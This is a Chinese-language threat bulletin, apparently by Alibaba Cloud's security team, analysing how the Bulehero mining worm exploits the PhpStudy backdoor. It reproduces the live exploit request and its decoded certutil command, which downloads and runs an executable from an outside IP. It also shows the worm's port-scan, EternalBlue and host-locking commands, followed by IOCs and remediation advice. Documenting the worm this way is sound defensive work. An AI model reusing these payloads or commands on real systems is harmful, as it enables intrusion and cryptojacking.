威脅快報|Bulehero挖礦蠕蟲升級，PhpStudy後門漏洞加入武器庫

概述

近日，阿里雲安全團隊監控到Bulehero挖礦蠕蟲進行了版本升級，蠕蟲升級後開始利用最新出現的PHPStudy後門漏洞做爲新的攻擊方式對Windows主機進行攻擊，攻擊成功後會下載門羅幣挖礦程序進行牟利。該挖礦程序會大肆搶佔服務器CPU資源進行門羅幣的挖掘，形成服務器卡頓，嚴重影響正常業務運行，甚至形成業務終端。關於該蠕蟲最先曝光於2018年7月，蠕蟲自出現後頻繁更新，陸續加入多達數十種的的攻擊方式，能夠預計該黑客團伙將會不斷的尋找新的攻擊方式來植入其惡意程序。建議用戶及時排查自身主機是否存在安全漏洞，並關注阿里雲安全團隊的相關文章。

背景介紹

Bulehero

Bulehero挖礦蠕蟲最先出現於2018年初，初次曝光於2018年8月，因最先使用bulehero.in域名被命名爲Bulehero。該蠕蟲專一於攻擊Windows服務器，經過植入惡意挖礦軟件進行牟利。它使用多種複雜的攻擊方式進行傳播，自出現後更新頻繁，不斷的將新的攻擊方式加入本身的武器庫。

PhpStudy後門漏洞

PhpStudy是國內的一款免費的PHP調試環境的程序集成包，在國內有着近百萬的PHP語言學習者和開發者用戶。在2019年9月20日，網上爆出PhpStudy存在「後門」：黑客早在2016年就編寫了「後門」文件，並不是法侵入了PhpStudy的官網，篡改了軟件安裝包植入「後門」。該「後門」具備遠程控制計算機的功能，能夠遠程控制下載運行腳本實現用戶我的信息收集。據報道黑客利用該漏洞共非法控制計算機67萬餘臺，非法獲取大量帳號密碼類、聊天數據類、設備碼類等數據10萬餘組。該「後門」除了會形成挖礦和信息泄露，還有可能被勒索病毒利用，服務器關鍵數據被勒索病毒加密後將沒法找回，給被害者形成大量的數據、經濟損失。

蠕蟲分析

攻擊行爲分析

攻擊者會向被攻擊的服務器發送一個利用漏洞的HTTP GET請求，惡意代碼存在於請求頭的Accept-Charset字段，字段內容通過base64編碼。解碼後能夠發現這是一段windows命令：利用certutil.exe工具下載download.exe

GET /index.php HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Charset: c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn
Referer: http://xxx:80/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xxx

解碼後內容：

system('certutil.exe -urlcache -split -f http://60.164.250.170:3888/download.exe %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe & %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe');echo md5('phpstudy');

被感染主機行爲

 

如上圖是惡意文件在主機中的行爲流程圖，download.exe是Bulehero的下載器，會下載名爲ScarupnpLogon.exe
的文件。該文件會釋放多個打包的惡意文件，這些惡意文件可分爲三個模塊：挖礦模塊、掃描模塊、攻擊模塊。

• 挖礦模塊：該模塊進行門羅幣的挖礦，Bulehero在該版本中並未使用公共礦池進行挖礦，改用自建的礦池代理進行挖礦任務分發，所以能夠避免暴露錢包地址，防止安全研究人員的跟蹤。
• 掃描模塊：該模塊會掃描互聯網的特定開放端口，並將掃描結果寫入到名爲Result.txt的文件中

C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe -iL C:\Windows\gstmlepnk\ntkpmzgif\ip.txt -oJ C:\Windows\gstmlepnk\ntkpmzgif\Result.txt --open --rate 4096 -p 445

• 攻擊模塊：
  該模塊集成多種漏洞利用工具，讀取掃描結果並攻擊其餘主機，以下進程是其使用永恆之藍漏洞模塊進行攻擊。

C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe --InConfig C:\Windows\gstmlepnk\UnattendGC\specials\svschost.xml --TargetIp 106.14.149.128 --TargetPort 445 --DllPayload C:\Windows\gstmlepnk\UnattendGC\AppCapture64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll

咱們對比Bulehero升級前的樣本行爲，發現它在主機中的行爲並未有較大改變，依然是經過download.exe下載器下載文件包，並釋放三個功能模塊。可是它爲了隱藏自身改變了惡意文件命名方式，升級前經過混淆的系統文件名進行假裝，升級後所有爲隨機的文件路徑和文件名。雖然隨機文件名相對於混淆系統文件名更容易暴露本身，但這種策略的好處是能夠避免被其餘挖礦病毒經過進程指紋清除，在資源競爭中佔據優點。

• 其餘行爲
  使用netsh ipsec安全工具，阻斷存在漏洞的服務端口，防止其餘競爭者進入。

netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filteraction name=BastardsList action=block

修改主機host防止其餘競爭者劫持域名。

cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

時間線

咱們根據Bulehero的惡意文件編譯時間和文件上傳時間，能夠肯定Bulehero的升級時間是在10月6號的23點，距離PhpStudy後門漏洞利用方式曝光只有2周。若是企業存在漏洞，去除中間的國慶長假，真正留給企業的修復之間只有幾天。從惡意文件下載次數來看，截止到發稿前已經有1萬5千次的下載，可見該蠕蟲傳播速度極快，形成的破壞性很大。

 

其餘攻擊方式

除了這次更新增長的PhpStudy後門漏洞，Bulehero還使用多種攻擊方式，以下是其餘已知的攻擊方式。

 

IOCs

60[.]164[.]250[.]170
185[.]147[.]34[.]136
fky[.]dfg45dfg45[.]best
uu[.]dfg45dfg45[.]best
uu1[.]dfg45dfg45[.]best
ox[.]mygoodluck[.]best
oo[.]mygoodluck[.]best

安全建議

1. 企業須要對涉及的漏洞及時修復，不然容易成爲挖礦木馬的受害者。
2. 建議使用阿里雲安全的下一代雲防火牆產品，其阻斷惡意外聯、可以配置智能策略的功能，可以有效幫助防護入侵。哪怕攻擊者在主機上的隱藏手段再高明，下載、挖礦、反彈shell這些操做，都須要進行惡意外聯；雲防火牆的攔截將完全阻斷攻擊鏈。此外，用戶還能夠經過自定義策略，直接屏蔽惡意網站，達到阻斷入侵的目的。此外，雲防火牆獨有的虛擬補丁功能，可以幫助客戶更靈活、更「無感」地阻斷攻擊。
3. 對於有更高定製化要求的用戶，能夠考慮使用阿里雲安全管家服務。購買服務後將有經驗豐富的安全專家提供諮詢服務，定製適合您的方案，幫助加固系統，預防入侵。入侵事件發生後，也可介入直接協助入侵後的清理、事件溯源等，適合有較高安全需求的用戶，或未僱傭安全工程師，但但願保障系統安全的企業。

本文做者：桑鐸

 

》》阿里雲雙11領億元補貼，拼手氣抽iPhone 11 Pro、衛衣等好禮，點此參與：http://t.cn/Ai1hLLJT](http://t.cn/Ai1hLLJT

 

閱讀原文

本文爲雲棲社區原創內容，未經容許不得轉載。